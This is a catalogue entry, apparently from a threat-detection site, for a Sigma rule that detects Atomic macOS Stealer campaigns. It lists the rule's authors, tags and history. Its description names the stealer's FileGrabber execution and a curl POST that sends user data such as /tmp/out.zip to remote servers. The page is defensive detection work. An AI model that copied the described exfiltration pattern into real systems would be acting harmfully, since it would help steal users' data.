Atomic MacOS Stealer - FileGrabber Activity

Rule Info

Name
Atomic MacOS Stealer - FileGrabber Activity
Author
Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
Description
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
Reference
https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html
Date
2025-11-22 00:00:00
Modified
None
Id
e710a880-1f18-4417-b6a0-b5afdf7e33da
Tags
attack.execution attack.t1059.002 detection.emerging-threats
Type
Community Rule
Link to Public Repo
https://github.com/SigmaHQ/sigma/search?q=e710a880-1f18-4417-b6a0-b5afdf7e33da

Rule History

Author
Title
Date
Commit
JasonPhang98
Merge PR #5669 from @JasonPhang98 - Extend Atomic MacOS Stealer - FileGrabber Rules
2025-11-24
bbbfb67ab
THOR Logo  Scan your endpoints, forensic images or collected files with our portable scanner THOR
  Warning: Access to VALHALLA is rate-limited - once you prove unworthy, access gets denied
  Nextron Systems 2022